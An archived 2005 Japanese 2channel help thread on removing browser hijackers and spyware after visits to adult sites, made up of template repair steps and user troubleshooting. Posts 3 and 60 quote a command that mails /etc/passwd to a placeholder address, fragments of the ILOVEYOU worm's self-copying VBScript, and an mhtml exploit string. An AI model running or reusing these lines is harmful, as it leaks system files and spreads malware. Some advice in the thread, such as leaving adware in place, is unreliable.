5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

エロサイトを見たら…助けてください!Part57

1 :ひよこ名無しさん:2005/07/28(木) 23:56:15 ID:???
エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの?って人のためのスレッドです。

【重要】ウソのアドバイスに注意して下さい。

●ブラウザハイジャッカーやウイルスの被害を減らすためにも
WindowsUpdateを利用してこまめにセキュリティパッチを当てましょう

▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

▼━回答者の方へ ━━━━━━━━━━━━━━━━━━━━
 ・ テンプレの方法を実行せずに質問する人は、徹底放置して下さい。
 ・ 出された指示を実行せずにレスする人は、徹底放置して下さい。
 ・ HijackThisの分析から嘘が判明した場合は、徹底放置して下さい。
 ・ 放置ができない回答者は、質問者が自作自演していると見なされます。

▼━禁止事項 ━━━━━━━━━━━━━━━━━━━
 ・ マルチポスト(複数の板・スレで同じことを質問)
 ・ 情報の小出し(始めにOSやソフト名等を必ず明示)
 ・ 違法な話題や質問(WinMX,Winny,エミュレータ等)
 ・ 天麩羅屋 & 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。
 ・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も禁止です。
前スレ:エロサイト見たら…助けて下さい!Part55
http://pc8.2ch.net/test/read.cgi/pcqa/1119362324

2 :ひよこ名無しさん:2005/07/28(木) 23:57:48 ID:???
質問する前に

※スパイウェア除去ウィザードの内容と基本的には同じです。
(1)から順を追って作業して下さい。

1)  IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→
   プログラム→WEB設定のリセット
  ※WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 

2) IEの履歴削除→ツール→インターネットオプション→全般→インターネット
   一時ファイル→クッキーの削除+ファイルの削除

3)  削除したいファイルがあるが「アクセスできません。使用中です」等といわれて
   削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動
  ◆セーフモードでも削除できないファイルがある時は「強削」
   ttp://www.vector.co.jp/soft/win95/util/se298257.html

4)  勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→
    アプリケーションの追加と削除→OS再起動

※コントロールパネルからアンインストールしなければならない主なもの
CnsMin(Jwordとかで使われてるスパイウェア)
ttp://www.higaitaisaku.com/removecnsmin.html
その他のコントロールパネルからアンインストールできる主なもの
ttp://www.higaitaisaku.com/uninstallinfo.html

※コントロールパネルからアンインストールしてはならないもの
Home Search Assistant、Shopping Wizard、Search Extender
という名前のものがコントロールパネルのアプリケーションにある場合。


3 :ひよこ名無しさん:2005/07/28(木) 23:59:03 ID:???
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT


4 :ひよこ名無しさん:2005/07/28(木) 23:59:15 ID:???
5) アンチウィルスソフトでウィルスを除去。
   アンチウィルスソフトを持っていない・サポート終了している場合は、オンラインスキャンを必ず行なって除去する事。

主なアンチウィルスソフトのサポート終了一覧
Symantec(Norton)
http://service1.symantec.com/SUPPORT/INTER/japanesecustserv.nsf/jdocid/20030919114134945?Open&src=&docid=20040206144851945&nsf=SUPPORT%5CINTER%5Cjapanesecustserv.nsf&view=jdocid&dtype=&prod=&ver=&osv=&osv_lvl=
TrendMicro(ウィルスバスター)
http://www.trendmicro.com/jp/support/old-versions/old-versions/products/vb.htm

TrendMicro OnlineScan(駆除可能・英語)
http://housecall.trendmicro.com/
Panda Active Scan (駆除可能・日本語)
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm

トレンドマイクロオンラインスキャン (手動駆除)
http://www.trendmicro.co.jp/hcall/index.asp
シマンテックセキュリティチェック (手動駆除)
http://security.symantec.com/sscv6/home.asp?productid=symhome&langid=jp&venid=sym&close_parent=true&bhcp=1

6)  ブラウザジャッカーCoolWebSearch駆除ツール
ttp://www.higaitaisaku.com/removecws.html

7) 定番スパイウェア除去ソフト、Ad-awareSEとSpybotS&Dを使って除去。

Ad-Aware SEによるスパイウェアの除去方法
ttp://www.higaitaisaku.com/adaware.html
http://lavasoft.element5.com/default.shtml.ja(公式サイト)
ttp://bdc.s15.xrea.com/(日本語化パッチ)

Spybot1.3によるスパイウェアの除去方法
ttp://www.higaitaisaku.com/spybot2.html
http://www.safer-networking.org/(公式サイト)

5 :ひよこ名無しさん:2005/07/28(木) 23:59:28 ID:???
>>3
しね

6 :ひよこ名無しさん:2005/07/29(金) 00:00:53 ID:???
8) Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。
   [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]→[システムの復元]

●「レジストリの復元」を使って正常なレジストリを復元する(9x限定)
MS-DOSモードで再起動する=スタート→終了→MS-DOSで再起動を選択
または、PCの電源を入れる→メーカーのロゴマークが表示される
→メーカーのロゴマークが消える直前から消えた瞬間、キーボードのF8を押す
→[Command prompt only] (または [コマンドプロンプトのみ])を選択する。
MS-DOSが起動したら「scanreg /restore」と入力して問題の起こる前の日付を選んで復元する。
※一番古い日付は不可
(入力コマンドには「」は入れないで下さい。また、コマンドのgと/の間に必ず半角スペースを入れる)

9)  既出ですよQ&A(個別のスパイウェア駆除方法)
About:blankの対処法
ttp://www.higaitaisaku.com/removeaboutblank.html
再発する場合には、ここを見て該当ファイルを駆除
ttp://www.higaitaisaku.com/cgi-bin/cbbs.cgi?mode=one&namber=4058&type=0&space=0&no=2
CoolWebSearchの除去方法
ttp://www.higaitaisaku.com/removecws.html
CnsMinの除去方法
ttp://www.higaitaisaku.com/removecnsmin.html
Gator/Gainの除去方法
ttp://www.higaitaisaku.com/removegator.html
C2.lopの除去方法
ttp://www.higaitaisaku.com/removelop.html
「英語で変な警告文が出てくるんですけど」という場合
ttp://www.higaitaisaku.com/removereg32.html
ttp://www.higaitaisaku.com/removecleanser.html
ttp://www.higaitaisaku.com/removewasher.html
ホームページが「*****.biz」になる場合
ttp://www.higaitaisaku.com/removesearchbiz.html

7 :ひよこ名無しさん:2005/07/29(金) 00:01:19 ID:???
        / ̄|
       |  |
       |  |                  / ̄ ̄ ̄ ̄ ̄ ̄
      ,―    \                |
     | ___)   |       ∩∩    ∠ リュンパッチ♪
     | ___)   |       | |_| |      \______
     | ___)   |\___(・∀・ )_____
     ヽ__)_/ \___     _____, )__
         〃  .       /    /     / /    〃⌒i
         |          /    ./     / /    .i::::::::::i
   ____|     /⌒\./    /     / | ____|;;;;;;;;;;;i
  [__]___|    / /-、 .\_.  /     Uし'[_]     .|
   | ||     |    / /i  i    /         | ||      |
   | ||____|____/ / .| .|\_ノ______..| ||      |
   |(_____ノ /_| |_________..| ||      |
   | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLL. | ||_____」
   | ||    (_/   / i                .| ||    | ||
   |_||        / .ノ               |_||    |_||
            (_/

8 :ひよこ名無しさん:2005/07/29(金) 00:02:13 ID:???
10)テンプレを全部やったが直らない!
Hijack Thisによるレポート出力と手動でのスパイウェア除去
ttp://www.higaitaisaku.com/hijackthis.html
自動的に診断してくれるページがあるので、ここにログを貼って診断してみる。
ttp://www.hijackthis.de/index.php?langselect=english
「Nasty(赤い!)」と書かれているものはFixしてOK。
「Possible Nasty(黄色い?)」は、無害なものも含まれているので自信がなければFixしないで下さい。

●それでも直らない場合は、このスレにHijackThisのログを貼って質問してみて下さい。
必ず、どの項目をやった結果どうでした、と詳しく症状・行なった対処法を書いてください。


■テンプレ補足
1.WindowsUpdateのやり方
IEを開く → ツール → WindowsUpdate
重要な更新は全てダウンロードしてインストールする事。

2.被害対策ウィザード(テンプレ>>2-4の手順ウィザード)
ttp://www.higaitaisaku.com/removewz01.html
テンプレじゃわかりにくい人は、こっちを使ってみて下さい。基本的なやる事は同じ。

3.IEが壊れてしまっている人用
IEの修復(ttp://www.higaitaisaku.com/iesyuufuku.html)を試す。
または、IE以外のブラウザを使ってみて、とりあえずテンプレを確認してください。

9 :ひよこ名無しさん:2005/07/29(金) 00:02:33 ID:???
                        \ | /
 ⊂⌒⊃        ⊂⌒⊃     ―‐ ● ―‐  ⊂⌒⊃
         ⊂⊃                 / | \          ⊂⊃
                  ⊂⊃
/~\へ/~\へへ/~\/~\へ/~\へ/~\へ/~\へヘ/~\/~\
,、,,,,,、,,,,、,,,、,,,,,,,,,,、,,,/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\_________
,, ,,,,,, ,,,, ,, ,,,, ,,,,,| 立った立った!チンコが立った! |            \
 ,,,, ,,, ,,,,, ,,,,,,, ,,,, , \ _____________/  糞スレも立った!  |
||=||=||=||=||=||∨=||=||=||=||=||=||=||=||\__  ______/
,,,,,,, ,,,,, ,,, ,, ,,,, ,,, ∧_∧ ,, , ∧_∧,, ,,,,, ,, __ ,,,, ,,,,,  ∨  ,,,,, ,,,, ,, ,, ,,,,
,, e@@e ,,,,,, ,,, ( o´∀`) ,,,,, (∀・ ; ) ,,, , , |   || ,,, ,,,, e@@e , ,,,, ,,, ,, , ,,
,,, (,・∀・) ,,, ,,⊂   ⊃,,, ,,⊂⊂⌒ヽ、, ,,, |!____i|| , ,,,♪ (・∀・,)_ノ ,,,,, ,,,, ,, ,
,〜((  ,,), ,,,, ,,,○(   ノ ,,,, プル ))   )○/_/) ,,,, ,, とと,,__つ , ,, ,, ,,
,,,, ,UUU ,,, ,,, ,,,,,, )__)_) ,, ,,, ,(( (_(_ノ ))プル,,,,◎ ,, ,,, ,, ,,,,, ,,,,, ,,, ミ ピョン
| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |
| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |

10 :ひよこ名無しさん:2005/07/29(金) 00:03:22 ID:???
               _
              /  \―。
            (    /  \_
             /       /  ヽ   / ̄ ̄ ̄ ̄ ̄
         ...―/          _)  < ちんちん シュッ! シュッ! シュッ!
        ノ:::へ_ __    /      \_____
        |/-=o=-     \/_
       /::::::ヽ―ヽ -=o=-_(::::::::.ヽ
      |○/ 。  /:::::::::  (:::::::::::::)
      |::::人__人:::::○    ヽ/
      ヽ   __ \      /
       \  | .::::/.|       /
        \lヽ::::ノ丿      /
          しw/ノ___-イ
           ∪


11 :ひよこ名無しさん:2005/07/29(金) 00:03:33 ID:???
  _、_
( ,_ノ` )y━・~~~ 

12 :ひよこ名無しさん:2005/07/29(金) 00:03:37 ID:???
           ☆
        / ̄|   ☆
       |  |彡   ビシィ
       |  |                 / ̄ ̄ ̄ ̄ ̄ ̄
      ,―    \               |
     | ___)   |       ∩∩   ∠  リュンパッチ♪
     | ___)   |       | |_| |     \______
     | ___)   |\___(・∀・ )_____
     ヽ__)_/ \___     _____, )__
         〃  .       /    /     / /    〃⌒i
         |          /    ./     / /    .i::::::::::i
   ____|     /⌒\./    /     / | ____|;;;;;;;;;;;i
  [__]___|    / /-、 .\_.  /     Uし'[_]     .|
   | ||     |    / /i  i    /         | ||      |
   | ||____|____/ / .| .|\_ノ______..| ||      |
   |(_____ノ /_| |_________..| ||      |
   | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLLL. | ||_____」
   | ||    (_/   / i                .| ||    | ||
   |_||        / .ノ               |_||    |_||
            (_/

13 :ひよこ名無しさん:2005/07/29(金) 00:03:59 ID:???
Q:クリックしたら突然登録・入会、固体識別番号・個人コードなどが表示された。
エロサイトをクリックしたら、ホストアドレスが表示されてしまって
個人情報がばれた、と書かれていました。お金を振り込めとありますが
お金を振り込まなければならないのでしょうか?

A:架空詐欺なので(゚ε゚)キニシナイ!!↓を見てみてね。
警視庁「ワンクリック料金請求にご用心」
http://www.keishicho.metro.tokyo.jp/haiteku/haiteku/haiteku35.htm
サギゼロ
ttp://sagi-0.bne.jp/pc/ --- ここの「よくある相談集」を。
架空請求・spam
http://pc7.2ch.net/antispam/



14 :ひよこ名無しさん:2005/07/29(金) 00:04:36 ID:???
クソスレ発見したので、ageておきますね。


       , --- 、_
      /ミミミヾヾヽ、_
   ∠ヾヾヾヾヾヾjj┴彡ニヽ
  / , -ー‐'"´´´    ヾ.三ヽ
  ,' /            ヾ三ヽ
  j |             / }ミ i
  | |              / /ミ  !
  } | r、          l ゙iミ __」   
  |]ムヽ、_    __∠二、__,ィ|/ ィ }    
  |    ̄`ミl==r'´     / |lぅ lj うんこぶりぶりぶぅ〜りぶりぃ〜♪
  「!ヽ、_____j ヽ、_  -'  レ'r'/  うんこぶりぶりぶぅ〜りぶりぃ〜♪ 
   `!     j  ヽ        j_ノ
   ',    ヽァ_ '┘     ,i
    ヽ  ___'...__   i   ハ__
     ヽ ゙二二 `  ,' // 八
      ヽ        /'´   / ヽ
      |ヽ、__, '´ /   /   \

15 :ひよこ名無しさん:2005/07/29(金) 00:05:01 ID:???

《その他リンク集》
■アダルトサイト被害対策の部屋
 ttp://www.higaitaisaku.com/
■WEB110[インターネットの犯罪・被害]追跡調査
 ttp://www.web110.com/
■アダルトサイトは安全?危険?
 ttp://www.kitanet.ne.jp/~ababu/sexy/index.html
■えっと驚く前に―国際電話・Q2からの事前防御策―
 ttp://www3.plala.or.jp/hiro-mg3920/tel.html
■アダルトサイト対策の部屋(ネット被害対策室)
 ttp://www002.upp.so-net.ne.jp/dalk/higai24.html
■国際電話・ダイヤルQ2関連
 http://www.ntt-east.co.jp/q2/ NTT東日本 ダイヤルQ2サービス
 http://www.ntt-west.co.jp/q2/ NTT西日本 ダイヤルQ2サービス
 ダイヤルQ2接続チェックプログラムもここからダウンロードできます。
 ttp://www.emurasoft.com/jp/chintcal/index.htm      No! 国際電話
 ttp://mitsu98.fc2web.com/bbs/index2.html         Dial Saver
 http://www.kddi.com/topics/atx/image.html         ダイヤルアップチェッカー
■バナー・ブラクラ対策
 ttp://homepage3.nifty.com/hayazo/myprg.html     ClosePopup
 http://www.proxomitron.org/                  Proxomitron(公式サイト)
 ttp://www.pluto.dti.ne.jp/~tengu/proxomitron/       Proxomitron(日本語解説)

16 :ひよこ名無しさん:2005/07/29(金) 00:05:59 ID:???
●アドバイスを装った悪質ないたずらにご用心
「パソコンのトラブル解消法」などと称して、
レジストリやシステムファイルの削除を勧める人がいます。
間違ってそれらを削除するとPCが起動できなくなってしまう恐れがあります。
もしもそのようなアドバイスをされた時は、その後のレスなどにも注意して、
十分よく考えて慎重に行動して下さい。

割り込まれようと泣き言は言わぬ


以上!

17 : ◆N9P3SuvBPo :2005/07/29(金) 00:11:00 ID:???
>1さん乙

あ、そういえば前スレの984踏んで見たんだけど何も表示されない白いページが表示されたよ。
マカフィー反応無かったから大丈夫だとは思うんだが、誰か鑑定スレに依頼してくれない。

前スレ999さん
Adwareは感染しないということは知っているけど、他にもウイルスが潜んでいそうな気がしそうで。

18 :ひよこ名無しさん:2005/07/29(金) 00:13:49 ID:???
「払わなくていいよ」

19 : ◆N9P3SuvBPo :2005/07/29(金) 00:17:28 ID:???
>18
ありがとうございます!
安心して眠れる事ができます。

20 :ひよこ名無しさん:2005/07/29(金) 00:18:04 ID:mODgcR/n
>>17
大丈夫。
Afwaraしか検出されなかった。
トロイちゃんは消した。

21 :ひよこ名無しさん:2005/07/29(金) 00:21:14 ID:???
>>19
       ∧         ∧
        / ヽ        ./ .∧
     /   `、     /   ∧ 
    /       ̄ ̄ ̄    ヽ  
   /:::::::::              .\  信じろ・・・・・・
  /:::::::::: ヽ-=・=-′ ヽ-=・=- ∧/           ∧
  ヽ:::::::::::    \___/   / ヽ          / ヽ
    ヽ::::::::::::::    \/    /   ヽ_____/  ヽ
  /            /                \
 |            /                   ヽ
 |            '''''"´)   ●   \─/  ●   |'´)
  \           -‐´         ヽ/       /´
   |       |   \                  /

22 :ひよこ名無しさん:2005/07/29(金) 01:07:18 ID:???
>>17
最近ウィンドウズアップデートしていれば問題などない
Exploit-ObjectData.gen
counter.htm

JS/Exploit-HelpXsite
index.htm
ttp://www.mcafeesecurity.com/japan/security/virE.asp?v=JS/Exploit-HelpXSite

Exploit-MhtRedir.gen
countme.htm

JS/Exploit-HelpXsite
start.htm

Exploit-ByteVerify
classload.jar

ほれ

23 :ひよこ名無しさん:2005/07/29(金) 01:12:39 ID:???
>>17
前スレ984
VBで JS_MHTREDIR.P って出たよ。

24 :ひよこ名無しさん:2005/07/29(金) 02:14:56 ID:mODgcR/n
パンダさんやったからか分からんが、急にwindowsから緊急アップデートとか表示された。
28件の重要更新と、26件のME用の更新があった。

25 :ひよこ名無しさん:2005/07/29(金) 09:34:03 ID:???
ここ数日病気でふせっている間、夫にPCを貸してあげました。
夫はPCに関しては一本指でやっと文字を打つ程度で、
私は「エロサイトは見るなよ」と釘を刺しておいたのですが。。。
誘惑に負けてみてしまったのか、検索履歴にしっかり「アダルト 無料」と(つД`)
お陰でお気に入りサイトを巡回しているとポップアップがバンバンきます。

やれ動くカーソルを手に入れろだの、出会いが欲しくないか、カジノもいいでしょ・・・etc

ノートン先生とアドウェアSEでは何も検知されませんでした。
どうしたらいいんでしょうか・・・(つд⊂)
(夫には今後一切エロサイト見るなと禁止令を出しましたw)

26 :25:2005/07/29(金) 09:34:42 ID:jie6OM0M
間違って下げちゃいました・・・あげ。

27 :ひよこ名無しさん:2005/07/29(金) 09:35:42 ID:???
>>26
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

28 :25:2005/07/29(金) 09:45:07 ID:jie6OM0M
OS       WindowsXP (Home)
ブラウザ   Sleipnir   (IE 6.0.2)
セキュ関係 ノートン試用版 アドウェアSE (avast!はノートンとの兼ね合いで休止中)
実行結果  異常なし

テンプレの2-10を読みました。

29 :荒岸 ◆EzMONa3xWM :2005/07/29(金) 09:57:41 ID:???
>>28
sleipnirのセキュリティからデフォルトセキュリティ→Java scriptの実行とActiveXの実行の
チェックがしてあれば外してみる。

30 :荒岸 ◆EzMONa3xWM :2005/07/29(金) 09:58:16 ID:???
>>28
それとspy-botも試して見て下さい


31 :25:2005/07/29(金) 10:03:36 ID:jie6OM0M
>>29
ありがとうございます。
今、パンダでオンラインスキャンもしていますが、すでに感染5と・・・(欝

他のオンラインスキャンでは出なかったので安心しきっていました。
時間なのでこのまま仕事にでます。
逝ってきます。

32 :25:2005/07/29(金) 17:37:00 ID:jie6OM0M
帰ってきて結果を見たら30個以上もスパイが入り込んでいました。
で、念のため>>29さんの仰っていたS&Dもやってみたら・・・
こちらは「おめでとうございます!感染はありません」だそうで。

パンダの結果を見た限りでは全てsystem32フォルダ内にあります。
全て削除していいものか迷っています。
なかには「削除できません」と出ているものもあるし・・・。

もうちょっと頑張って調べてみます。なにか良策ご存知でしたら助けてください。
お願い致します。

33 : ◆N9P3SuvBPo :2005/07/29(金) 17:41:25 ID:???
>ALL(前スレの984の件)
なるほどありがとう。
やはりウイルスが検出されましたか。
いちおう俺WindowsUpdateしてるから全く何も問題は無いけど、ただそのページに
アクセスしたときな、混んでいるのか知らんけど中々読み込まれないので、でも
そのかわり何かのURLが下のメニューバーに表示されていたから、もしかしたら
と思って書き込んでしまいました。
IEのキャッシュをクリアしてしまえばウイルス消滅ってことですね。

>25
感染させたのは「夫」なんだろ。
だったら夫に責任取らせろよ。

34 :KING:2005/07/29(金) 18:07:20 ID:Z73kRCNp
削除するしか脳がない管理者。
ガセスレすると業者だとバカ騒ぎする集まり

http://bbs02.nan-net.com/system/log/56


35 :ひよこ名無しさん:2005/07/29(金) 18:14:49 ID:???
>>32
どんなスパイウェアがどこで発見されているのか分からないと、答えられないし。

あと、感染したついでと言ってしまっては申し訳ないけど、
ttp://housecall.trendmicro.com/
のSpywareScannerも試して頂くことはできますか?
個人的に、Pandaと比較してどの程度の検出力か興味があるので。

36 :25:2005/07/29(金) 18:17:59 ID:???
>>33
責任と言われても(´・ω・`)
簡単なエラーも解決できない奴に何を言っても無駄でしょう。。。
旦那が高給取りなら「新しいパソコン買って」とでも言えましょうが。。。
安易に貸した私にも責任はありますし。

うざがられているならもう来ません。すみませんでした。


37 :25:2005/07/29(金) 18:19:50 ID:???
>>35
肝心なことを書いていませんでしたね(^^;
出たもの全て「Look2Me」でした。
リンク先のも試して後で報告だけ残していきます。

38 : ◆N9P3SuvBPo :2005/07/29(金) 18:20:38 ID:???
>36
いやいや、暴言はいてすみません!
別にウザイとかそういうことじゃないのですが。

う〜ん、OSがWindowsXPなら「システムの復元」試してみたか?
無論セーフモードで。

39 :35:2005/07/29(金) 18:21:47 ID:???
35のリンクだとspyware scannerの場所が分かりづらいかもしれないのでリンク場所の変更。
ttp://www.trendmicro.com/spyware-scan/

ココからtmas-web-scan.exeをdownloadして実行します。

40 :25:2005/07/29(金) 18:26:38 ID:???
>>38
うは。こちらこそ早合点ですみませんです(||´・ω・)

システムの復元ですか〜。そうですね、今>>35さんのリンク先のヤツを
動かしている最中なので、一通り終わったらやってみます。
ありがとうございます!

41 :25:2005/07/29(金) 18:29:47 ID:???
>>35
完了しました。
Summary of Privacy Threats:7 item(s) classified as Cookie

ということでどうやらパンダの方が精度は上?



42 : ◆N9P3SuvBPo :2005/07/29(金) 18:37:43 ID:???
>39さんのスパイウェアスキャナーを前に一度やったことがあります。
自分の場合以下2つが見つかりました。
Found '' in 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\Range1'
Found '' in 'Software\Microsoft\Internet Explorer\Explorer Bars\{30D02401-6A81-11D0-8274-00C04FD5AE38}'

前者は、SPY-BOT S&Dで登録された制限付きサイトのURL
後者は、レジストリのCLSIDなど分析した結果、「C:\WINDOWS\SYSTEM\BROWSEUI.DLL」
さらにプロパティ調査を行なってみると以下の結果が出た。
ファイル ヴァージョン : 6.00.2800.1622 (xpsp2.050218-1437)
説明 : Shell Browser UI Library
著作権 : (C) Microsoft Corporation. All rights reserved.
会社名 : Microsoft Corporation
言語 : 日本語
っていうような・・・なんか誤検出っぽいような気がする不思議な感じが…

43 :35:2005/07/29(金) 18:37:51 ID:???
ありがとうございます。
Pandaの方が上ですか。
専門のツールが、アンチウイルスに負けているとは(w

さて、Look2Meって事ですが、前スレに削除方法が書かれたリンクがあったので
コピーしておきます。

44 :ひよこ名無しさん:2005/07/29(金) 18:40:30 ID:???
>>42
その誤検出は私もみた事があります。
恐らく、今のバージョンでは改善されているんじゃないかと思いますが未確認です。
#FireFoxしか使っていないので、Spybot入れてないので。

45 :35:2005/07/29(金) 18:41:52 ID:???
urlコピーし忘れてた。
ttp://66.102.7.104/search?q=cache:mHzw_V0L2woJ:www.higaitaisaku.com/fswiki/wiki.cgi%3Faction%3DID%26b%3DINF4kxK4xw44cCPEivVkXg+Adware+Look2Me+&hl=ja&lr=lang_ja

46 :35:2005/07/29(金) 19:05:32 ID:???
  _、_
( ,_ノ` )y━・~~~ しかし暑いね〜

47 :ひよこ名無しさん:2005/07/29(金) 20:19:53 ID:pXKRiREh


48 :25:2005/07/29(金) 20:33:56 ID:???
え〜・・・削除方法に則って慎重に作業中です。
Look2Meだと分かってから自分でググって見た中で、大事なファイルまであぼんして
起動しなくなったという方の日記を見たのでちと不安です。

失敗した時の為にも今のうちに大事なものとそうで無いものを取捨選択しておこうと思います。


ムシムシしてる中でフル稼働してるPCの熱が更に不快指数を・・・。

49 : ◆N9P3SuvBPo :2005/07/29(金) 20:50:29 ID:???
>48
システムの復元もダメだったか…

しかしこういう時こそ、回復コンソじゃない、ほらあれ!
HijackThisのログです。

50 :25:2005/07/29(金) 20:53:38 ID:???
>>49
いや、復元は最終手段としてとっておこうと思ってました。
これで起動しなくなれば最終手段もなにもありませんが(´・ω:;.:...

51 : ◆N9P3SuvBPo :2005/07/29(金) 20:58:46 ID:???
まあ、起動しなくなっても運がよければセーフモードで起動できる場合がある。
だが運が悪くセーフモードの起動も失敗した場合は、OSを再インストールするしかない。

しかしLock2MEってやっかいだなあ。

52 :ひよこ名無しさん:2005/07/29(金) 22:17:34 ID:h70ywI4y
>>48
LookMEと共存してるけど、別に問題ないですよ。
放置しても構わないかと。

53 :25:2005/07/29(金) 22:20:53 ID:k6oa7iRw
携帯からです。
どうやら削除したファイルが原因で起動しませんでした。
セーフモードでも無理…(つд`)残念ですが総入れ直しします。
旦那が帰宅したら現実を見せて土下座させます。

コツコツ積み上げたカスタマイズの結晶を返せー!!(泣

54 :ひよこ名無しさん:2005/07/29(金) 22:25:18 ID:h70ywI4y
俺のPCも起動させると海外のアダルトサイトが強制的に出てきて、一切IEできなくなる。
だけど、2chブラウザからリンクからだと普通にIE見れる。

55 : ◆N9P3SuvBPo :2005/07/29(金) 22:49:29 ID:???
>53
うやあマジ!
「回復コンソール」を使って修復する手もあるが、やはりリカバリが一番手っ取り早い。

56 :25@携帯:2005/07/29(金) 22:58:16 ID:k6oa7iRw
ふて寝したのですが、諦めがつかずダメ元で前回正常起動時の状態で立ち上げてみたら…
セーフモードですがキました!
さて、これからどうしよう(´ω`)

57 :ひよこ名無しさん:2005/07/29(金) 23:23:29 ID:???
>>56
もういい加減リカバリしろよwww

58 :25:2005/07/30(土) 00:07:15 ID:???
いい加減ここに居座るのもなんですし、無事に起動したので今後を観察して
リカバリなり共存なり選びたいとおもいますです。
エロ旦那にはPC触んなヴォケと言っておく事にします。

>>35さん、◆N9P3SuvBPoさん、ありがとうございました。
ではでは(´ー`)ノ

59 :ひよこ名無しさん:2005/07/30(土) 00:07:50 ID:???
>>56
大事なデータを保存してから(ry

60 :ひよこ名無しさん:2005/07/30(土) 01:06:21 ID:???
cat /etc/passwd | mail

61 :ひよこ名無しさん:2005/07/30(土) 03:02:50 ID:kRqG8TmZ
>>60
ウイルスに感染しちゃったじゃないか。
リカバリしなきゃ。

62 :ひよこ名無しさん:2005/07/30(土) 03:12:49 ID:qJ8fNmUC
http://2style.jp/bluecoin/

63 :ひよこ名無しさん:2005/07/30(土) 18:54:43 ID:???
保守

64 : ◆N9P3SuvBPo :2005/07/30(土) 19:36:30 ID:???
>58
共存だけは絶対に止めておいたほうがいいよ。

あと、ひとつ質問いいですか?
ウイルス感染する前に「WindowsUpdate」を行い、OSの脆弱性を防いでいましたか?

65 :ひよこ名無しさん:2005/07/30(土) 19:39:22 ID:???
       , '´         :::::::::::ヽ、
      /     ,/ ||| \,  ::::::::::ヽ
      |   =="       `== ::::::::|
      |   -=・=-′ ヽ-=・=- :::::::::|
      |               ::::::::::|   え?
      |     (_人_)   ::::::::|
       'ヽ__        :::::::::::/

66 :ひよこ名無しさん:2005/07/30(土) 20:25:08 ID:vQUTlBEV
エロサイトは見ていないのですが
http://pc8.2ch.net/test/read.cgi/internet/1121426401/2
Q:ブラウザを立ち上げると、変な外国サイトやポップアップが出るよ!
に該当するので質問させてください。
スレ違いでしたらごめんなさい。

OS:Windows XP Service Pack 2
ブラウザ:unDonut release12d
ウイルスバスター常時起動

海外のフラッシュゲームサイトをいくつか見たせいか、
ポップアップ表示されるようになりました。
以下ポップアップの一部
ttp://www.loadingwebsite.com/normal/yyy34.html
ttp://www9.paypopup.com/belnk/belnk.htm
ttp://www.cursormania.com/?partner=ZCxdm500&spu=true

Ad-Aware SE Personalで検索して消すのですが
何回も復元されて出てきます。
インターネットオプションのファイル削除もしました。
ウイルス検索しても何も出てきません。

ブラウザを立ち上げている最中も閉じてからも何度も何度も出てきます。
どのように対処したら二度と出てこなくなるのか教えてください。

67 :ひよこ名無しさん:2005/07/30(土) 20:29:14 ID:CcEaqLkR
中国サイバーテロ!!?
http://gazoubbs.com/publicity/img/1122394400/6.gif

個別訪問を行いたいと思っております。

★拠点
【お盆】中国バカーVS日本ビパー part111+【仏降臨】
http://ex11.2ch.net/test/read.cgi/news4vip/1122479952/

民間の反日系中国ウエッブサイトへの抗議をしてくださる、お持ちの知識・技術を活用してくださる 等

・ ・ ・ ・
日 中 友 好  目的 での、ご参加をお待ちしております。

68 :ひよこ名無しさん:2005/07/30(土) 20:34:35 ID:???
>>66
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

69 :66:2005/07/30(土) 22:35:21 ID:vQUTlBEV
テンプレ全部やってみました。
特に>>2>>6>>8を重点的にやってみましたが問題は解決しません。
ログをここに書き込めばいいのでしょうか?

70 :ひよこ名無しさん:2005/07/30(土) 22:36:21 ID:???
>>69
うん。
で、鑑定人は少ないから、気長に待つ。

71 :66:2005/07/30(土) 22:38:27 ID:vQUTlBEV
分かりました。
長いのですがどこを載せればいいのか分からないので載せます。

72 :66:2005/07/30(土) 22:40:36 ID:vQUTlBEV
